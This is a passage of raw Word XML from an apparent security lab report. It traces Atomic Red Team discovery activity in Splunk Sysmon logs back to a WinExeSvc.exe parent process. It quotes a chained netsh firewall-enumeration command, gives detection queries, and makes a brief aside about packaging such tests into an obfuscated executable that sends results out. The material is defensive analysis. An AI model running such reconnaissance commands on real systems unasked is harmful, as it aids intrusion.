          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (Get-Volume -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>DriveLetter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDriveLetter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SizeRemaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write-Host 'Current system drive space:', $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDriveSpace.ToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>('N0') if ($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SystemDriveSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>MinDiskSpaceThreshold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>) { Write-Host 'System drive space is less than the threshold:', $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>MinDiskSpaceThreshold.ToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">('N0'), 'Block Upgrade.' $Res = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>1 }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> } catch { # Do nothing } Write-Host 'Final result:', $Res</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5E1FE525" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="08A6AEEF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This command is a typical check run by the operating system for checking available space prior to system update but Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> causes the query we’ve crafted to return this non-malicious process. Setting up an alert for T1518.001 can be incredibly useful when tailored to your environment. I will leave the alert setup steps for you, found in S04B, if you’d like. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7D91CF47" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="5DC9C96F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Also, you may see some output from the .exe we ran as administrator in Part A. Really, this whole process could be packaged and obfuscated in an executable that then transfers the output of our test to a recipient, but I’ve chosen to break it into separate parts. For now, let’s ignore the Encoded Command and dig a little deeper. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0E15504D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="192A3918" w14:textId="467A2F20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890124" w:id="8"/>
      <w:r>
        <w:t>3.4 Analysis: Trace/Root Cause</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="488353B4" w14:textId="77777777"/>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="5F7450AF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting some of the shortened individual command entry events will show the shared parent process of the chained netsh.exe command (i.e. “\"cmd.exe\" /c netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>allprofiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  &amp;amp; netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall dump &amp;amp ….”). Since this is the most prominent and inclusive command identified let’s start there, we can go directly to the parent process of this command from the query and see:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C48297C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="476C40B4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5ABDE1" wp14:editId="3073AFEE">
            <wp:extent cx="5080000" cy="2080303"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="10834960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496098" name="Picture 1" descr="A screenshot of a compu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99321" cy="2088215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="22C41D19" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1A8DC190" w14:textId="633DEC95">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Searching this process with:</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=1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="*Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">and locating this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>parent_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="66876081" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4B476A1C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B580623" wp14:editId="712EEE2A">
            <wp:extent cx="4806950" cy="1205332"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1044823457" name="Picture 1" descr="A screenshot of a black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23457" name="Picture 1" descr="A screenshot of a black scree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52904" cy="1216855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0DBE81E0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="60892FB6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">WinExeSvc.exe is a Windows application, often flagged by antivirus software as potentially malicious, that is used to facilitate the execution of commands on a Windows host from Linux or other Unix-based systems, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="09F841F2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="00B31831" w:rsidRDefault="0081210C" w14:paraId="140698D0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Let’s imagine this is a command that is unauthorized and now identified to have been executed remotely given that (to our administrative knowledge so far) there is not (or is not meant to be) Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> setup on these systems. We have a TCP stream capturing traffic so let’s combine the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> discovery with the TCP stream and see if we can identify any connections on commonly used remote execution ports. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5C212A5E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7F634AEF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1F3EBD85" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="*Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="44F9532F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| eval </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=_time - 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2BF910EF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">| eval </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
